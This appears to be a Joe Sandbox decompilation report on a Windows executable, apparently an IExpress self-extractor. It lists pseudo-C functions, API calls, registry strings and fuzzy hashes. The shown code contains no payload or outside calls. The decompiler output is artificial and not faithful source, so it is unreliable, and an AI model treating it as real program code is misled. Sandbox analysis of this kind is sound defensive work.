                                                                                                                                                                                                                                              							goto L7;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L12:
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                              							_v8 = 0;
                                                                                                                                                                                                                                              							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                              							if(_t24 == 0) {
                                                                                                                                                                                                                                              								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                              								L6:
                                                                                                                                                                                                                                              								asm("sbb eax, eax");
                                                                                                                                                                                                                                              								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                              								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							L7:
                                                                                                                                                                                                                                              							_t31 = _v8;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t31;
                                                                                                                                                                                                                                              				goto L12;
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00974096,00974096,?,00971ED3,00000001,00000000,?,?,00974137,?), ref: 009725B2
                                                                                                                                                                                                                                              • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00974096,?,00971ED3,00000001,00000000,?,?,00974137,?,00974096), ref: 009725CB
                                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,00971ED3,00000001,00000000,?,?,00974137,?,00974096), ref: 009725DD
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00974096,00974096,?,00971ED3,00000001,00000000,?,?,00974137,?), ref: 009725FF
                                                                                                                                                                                                                                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00974096,00000000,00000000,00000000,00000000,?,00971ED3,00000001,00000000), ref: 0097261A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 009725F5
                                                                                                                                                                                                                                              • PendingFileRenameOperations, xrefs: 009725C3
                                                                                                                                                                                                                                              • System\CurrentControlSet\Control\Session Manager, xrefs: 009725A8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                              • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                              • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                              • Opcode ID: fc6635eee8bf17df4779ba5640b4697aa41bd6b752ce82f5f9442126b5e4b8e2
                                                                                                                                                                                                                                              • Instruction ID: c47c4147ae3b7cf3959cdc58a9bbc8f459e9590c599afca0e1b23a5346d65c64
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc6635eee8bf17df4779ba5640b4697aa41bd6b752ce82f5f9442126b5e4b8e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1114236A66228BB9B209B919C0DDFF7EBCEF45BA1F108056B80CE2010D6305E44E6A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 577 976a60-976a91 call 977155 call 977208 GetStartupInfoW 583 976a93-976aa2 577->583 584 976aa4-976aa6 583->584 585 976abc-976abe 583->585 586 976aaf-976aba Sleep 584->586 587 976aa8-976aad 584->587 588 976abf-976ac5 585->588 586->583 587->588 589 976ac7-976acf _amsg_exit 588->589 590 976ad1-976ad7 588->590 591 976b0b-976b11 589->591 592 976b05 590->592 593 976ad9-976ae9 call 976c3f 590->593 594 976b13-976b24 _initterm 591->594 595 976b2e-976b30 591->595 592->591 599 976aee-976af2 593->599 594->595 597 976b32-976b39 595->597 598 976b3b-976b42 595->598 597->598 600 976b67-976b71 598->600 601 976b44-976b51 call 977060 598->601 599->591 602 976af4-976b00 599->602 605 976b74-976b79 600->605 601->600 612 976b53-976b65 601->612 603 976c39-976c3e call 97724d 602->603 608 976bc5-976bc8 605->608 609 976b7b-976b7d 605->609 613 976bd6-976be3 _ismbblead 608->613 614 976bca-976bd3 608->614 610 976b94-976b98 609->610 611 976b7f-976b81 609->611 617 976ba0-976ba2 610->617 618 976b9a-976b9e 610->618 611->608 616 976b83-976b85 611->616 612->600 619 976be5-976be6 613->619 620 976be9-976bed 613->620 614->613 616->610 622 976b87-976b8a 616->622 623 976ba3-976bbc call 972bfb 617->623 618->623 619->620 620->605 621 976c1e-976c25 620->621 627 976c27-976c2d _cexit 621->627 628 976c32 621->628 622->610 625 976b8c-976b92 622->625 623->621 630 976bbe-976bbf exit 623->630 625->616 627->628 628->603 630->608
                                                                                                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                                                                                                              			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                              				signed int* _t25;
                                                                                                                                                                                                                                              				signed int _t26;
                                                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				signed int _t37;
                                                                                                                                                                                                                                              				signed char _t41;
                                                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                                                              				signed int _t54;
                                                                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                                                                                              				signed int _t59;
                                                                                                                                                                                                                                              				intOrPtr* _t60;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				void* _t67;
                                                                                                                                                                                                                                              				void* _t68;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				E00977155();
                                                                                                                                                                                                                                              				_push(0x58);
                                                                                                                                                                                                                                              				_push(0x9772b8);
                                                                                                                                                                                                                                              				E00977208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                              				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                              				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                              				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                              				_t53 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                              					if(0 == 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(0 != _t56) {
                                                                                                                                                                                                                                              						Sleep(0x3e8);
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t58 = 1;
                                                                                                                                                                                                                                              						_t53 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L7:
                                                                                                                                                                                                                                              					_t67 =  *0x9788b0 - _t58; // 0x2
                                                                                                                                                                                                                                              					if(_t67 != 0) {
                                                                                                                                                                                                                                              						__eflags =  *0x9788b0; // 0x2
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							 *0x9781e4 = _t58;
                                                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							 *0x9788b0 = _t58;
                                                                                                                                                                                                                                              							_t37 = E00976C3F(0x9710b8, 0x9710c4); // executed
                                                                                                                                                                                                                                              							__eflags = _t37;
                                                                                                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                                                                                                              								goto L13;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                              								_t30 = 0xff;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_push(0x1f);
                                                                                                                                                                                                                                              						L00976FF4();
                                                                                                                                                                                                                                              						L13:
                                                                                                                                                                                                                                              						_t68 =  *0x9788b0 - _t58; // 0x2
                                                                                                                                                                                                                                              						if(_t68 == 0) {
                                                                                                                                                                                                                                              							_push(0x9710b4);
                                                                                                                                                                                                                                              							_push(0x9710ac);
                                                                                                                                                                                                                                              							L00977202();
                                                                                                                                                                                                                                              							 *0x9788b0 = 2;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if(_t53 == 0) {
                                                                                                                                                                                                                                              							 *0x9788ac = 0;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t71 =  *0x9788b4;
                                                                                                                                                                                                                                              						if( *0x9788b4 != 0 && E00977060(_t71, 0x9788b4) != 0) {
                                                                                                                                                                                                                                              							_t60 =  *0x9788b4; // 0x0
                                                                                                                                                                                                                                              							 *0x97a288(0, 2, 0);
                                                                                                                                                                                                                                              							 *_t60();
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                                                              						_t59 =  *_t25;
                                                                                                                                                                                                                                              						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                                                              							_t41 =  *_t59;
                                                                                                                                                                                                                                              							if(_t41 > 0x20) {
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							if(_t41 != 0) {
                                                                                                                                                                                                                                              								if(_t54 != 0) {
                                                                                                                                                                                                                                              									goto L32;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                              										_t59 = _t59 + 1;
                                                                                                                                                                                                                                              										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              										_t41 =  *_t59;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                              							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                              								_t29 = 0xa;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push(_t29);
                                                                                                                                                                                                                                              							_t30 = E00972BFB(0x970000, 0, _t59); // executed
                                                                                                                                                                                                                                              							 *0x9781e0 = _t30;
                                                                                                                                                                                                                                              							__eflags =  *0x9781f8;
                                                                                                                                                                                                                                              							if( *0x9781f8 == 0) {
                                                                                                                                                                                                                                              								exit(_t30); // executed
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags =  *0x9781e4;
                                                                                                                                                                                                                                              							if( *0x9781e4 == 0) {
                                                                                                                                                                                                                                              								__imp___cexit();
                                                                                                                                                                                                                                              								_t30 =  *0x9781e0; // 0x80070002
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                              							goto L40;
                                                                                                                                                                                                                                              							L32:
                                                                                                                                                                                                                                              							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                              							if(_t41 == 0x22) {
                                                                                                                                                                                                                                              								__eflags = _t54;
                                                                                                                                                                                                                                              								_t15 = _t54 == 0;
                                                                                                                                                                                                                                              								__eflags = _t15;
                                                                                                                                                                                                                                              								_t54 = 0 | _t15;
                                                                                                                                                                                                                                              								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                              							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                              							__eflags = _t26;
                                                                                                                                                                                                                                              							if(_t26 != 0) {
                                                                                                                                                                                                                                              								_t59 = _t59 + 1;
                                                                                                                                                                                                                                              								__eflags = _t59;
                                                                                                                                                                                                                                              								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t59 = _t59 + 1;
                                                                                                                                                                                                                                              							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L40:
                                                                                                                                                                                                                                              					return E0097724D(_t30);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t58 = 1;
                                                                                                                                                                                                                                              				__eflags = 1;
                                                                                                                                                                                                                                              				goto L7;
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x00976b90
                                                                                                                                                                                                                                              0x00976b83
                                                                                                                                                                                                                                              0x00976b81
                                                                                                                                                                                                                                              0x00976b94
                                                                                                                                                                                                                                              0x00976b98
                                                                                                                                                                                                                                              0x00976ba2
                                                                                                                                                                                                                                              0x00976b9a
                                                                                                                                                                                                                                              0x00976b9a
                                                                                                                                                                                                                                              0x00976b9a
                                                                                                                                                                                                                                              0x00976ba3
                                                                                                                                                                                                                                              0x00976bab
                                                                                                                                                                                                                                              0x00976bb0
                                                                                                                                                                                                                                              0x00976bb5
                                                                                                                                                                                                                                              0x00976bbc
                                                                                                                                                                                                                                              0x00976bbf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976bbf
                                                                                                                                                                                                                                              0x00976c1e
                                                                                                                                                                                                                                              0x00976c25
                                                                                                                                                                                                                                              0x00976c27
                                                                                                                                                                                                                                              0x00976c2d
                                                                                                                                                                                                                                              0x00976c2d
                                                                                                                                                                                                                                              0x00976c32
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976bc5
                                                                                                                                                                                                                                              0x00976bc5
                                                                                                                                                                                                                                              0x00976bc8
                                                                                                                                                                                                                                              0x00976bcc
                                                                                                                                                                                                                                              0x00976bce
                                                                                                                                                                                                                                              0x00976bce
                                                                                                                                                                                                                                              0x00976bd1
                                                                                                                                                                                                                                              0x00976bd3
                                                                                                                                                                                                                                              0x00976bd3
                                                                                                                                                                                                                                              0x00976bd6
                                                                                                                                                                                                                                              0x00976bda
                                                                                                                                                                                                                                              0x00976be1
                                                                                                                                                                                                                                              0x00976be3
                                                                                                                                                                                                                                              0x00976be5
                                                                                                                                                                                                                                              0x00976be5
                                                                                                                                                                                                                                              0x00976be6
                                                                                                                                                                                                                                              0x00976be6
                                                                                                                                                                                                                                              0x00976be9
                                                                                                                                                                                                                                              0x00976bea
                                                                                                                                                                                                                                              0x00976bea
                                                                                                                                                                                                                                              0x00976b74
                                                                                                                                                                                                                                              0x00976c39
                                                                                                                                                                                                                                              0x00976c3e
                                                                                                                                                                                                                                              0x00976c3e
                                                                                                                                                                                                                                              0x00976abe
                                                                                                                                                                                                                                              0x00976abe
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00977155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00977182
                                                                                                                                                                                                                                                • Part of subcall function 00977155: GetCurrentProcessId.KERNEL32 ref: 00977191
                                                                                                                                                                                                                                                • Part of subcall function 00977155: GetCurrentThreadId.KERNEL32 ref: 0097719A
                                                                                                                                                                                                                                                • Part of subcall function 00977155: GetTickCount.KERNEL32 ref: 009771A3
                                                                                                                                                                                                                                                • Part of subcall function 00977155: QueryPerformanceCounter.KERNEL32(?), ref: 009771B8
                                                                                                                                                                                                                                              • GetStartupInfoW.KERNEL32(?,009772B8,00000058), ref: 00976A7F
                                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 00976AB4
                                                                                                                                                                                                                                              • _amsg_exit.MSVCRT ref: 00976AC9
                                                                                                                                                                                                                                              • _initterm.MSVCRT ref: 00976B1D
                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00976B49
                                                                                                                                                                                                                                              • exit.KERNELBASE ref: 00976BBF
                                                                                                                                                                                                                                              • _ismbblead.MSVCRT ref: 00976BDA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 836923961-0
                                                                                                                                                                                                                                              • Opcode ID: 7839f22cad979359ea478a3ffd50ed4f5e06803cdf65c355e1a07288db7a0eeb
                                                                                                                                                                                                                                              • Instruction ID: 94981c9157a0e2273803d5cef9970fed16f6462b25f9289fb5c251c6091cb7b2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7839f22cad979359ea478a3ffd50ed4f5e06803cdf65c355e1a07288db7a0eeb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B41F53395CB15CBDB219F68DC097AA7BA8BB85721F54C01AE86DE3291DF7448809B41
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              control_flow_graph 631 9758c8-9758d5 632 9758d8-9758dd 631->632 632->632 633 9758df-9758f1 LocalAlloc 632->633 634 9758f3-975901 call 9744b9 633->634 635 975919-975959 call 971680 call 97658a CreateFileA LocalFree 633->635 638 975906-975910 call 976285 634->638 635->638 644 97595b-97596c CloseHandle GetFileAttributesA 635->644 645 975912-975918 638->645 644->638 646 97596e-975970 644->646 646->638 647 975972-97597b 646->647 647->645
                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E009758C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                                                              				signed char _t16;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				intOrPtr* _t27;
                                                                                                                                                                                                                                              				CHAR* _t33;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t33 = __ecx;
                                                                                                                                                                                                                                              				_t27 = __ecx;
                                                                                                                                                                                                                                              				_t23 = __ecx + 1;
                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                              					_t6 =  *_t27;
                                                                                                                                                                                                                                              					_t27 = _t27 + 1;
                                                                                                                                                                                                                                              				} while (_t6 != 0);
                                                                                                                                                                                                                                              				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                              				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                              				if(_t20 != 0) {
                                                                                                                                                                                                                                              					E00971680(_t20, _t36, _t33);
                                                                                                                                                                                                                                              					E0097658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                              					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                              					_v8 = _t10;
                                                                                                                                                                                                                                              					LocalFree(_t20);
                                                                                                                                                                                                                                              					_t12 = _v8;
                                                                                                                                                                                                                                              					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						CloseHandle(_t12);
                                                                                                                                                                                                                                              						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                              						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                              							goto L4;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							 *0x979124 = 0;
                                                                                                                                                                                                                                              							_t14 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E009744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					L4:
                                                                                                                                                                                                                                              					 *0x979124 = E00976285();
                                                                                                                                                                                                                                              					_t14 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t14;
                                                                                                                                                                                                                                              			}














                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00975534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 009758E7
                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00975534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00975943
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00975534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0097594D
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00975534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0097595C
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00975534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00975963
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                              • API String ID: 747627703-1664176527
                                                                                                                                                                                                                                              • Opcode ID: c82913f6c17454af0669b8a1aff224ddadde8ea042732c5a88ea03fae5172e4f
                                                                                                                                                                                                                                              • Instruction ID: 6624126de499a5823bea03d1710143810cb3746f8c1aa0a25ee2ac0ef0cb4b4f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c82913f6c17454af0669b8a1aff224ddadde8ea042732c5a88ea03fae5172e4f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0112233718211ABD7201F79AC0DB9B7E9DEFC6364B508A25B60ED3191DAB0884592A4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E009751E5(void* __eflags) {
                                                                                                                                                                                                                                              				int _t5;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t1 = E0097468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                              				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                              				if(_t28 != 0) {
                                                                                                                                                                                                                                              					if(E0097468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                              						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                              						if(_t5 != 0) {
                                                                                                                                                                                                                                              							_t6 = E009744B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                              							LocalFree(_t28);
                                                                                                                                                                                                                                              							if(_t6 != 6) {
                                                                                                                                                                                                                                              								 *0x979124 = 0x800704c7;
                                                                                                                                                                                                                                              								L10:
                                                                                                                                                                                                                                              								return 0;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							 *0x979124 = 0;
                                                                                                                                                                                                                                              							L6:
                                                                                                                                                                                                                                              							return 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						LocalFree(_t28);
                                                                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					E009744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					LocalFree(_t28);
                                                                                                                                                                                                                                              					 *0x979124 = 0x80070714;
                                                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E009744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              				 *0x979124 = E00976285();
                                                                                                                                                                                                                                              				goto L10;
                                                                                                                                                                                                                                              			}







                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746A0
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: SizeofResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746A9
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746C3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LoadResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746CC
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LockResource.KERNEL32(00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746D3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: memcpy_s.MSVCRT ref: 009746E5
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009746EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00972F4D,?,00000002,00000000), ref: 00975201
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00975250
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
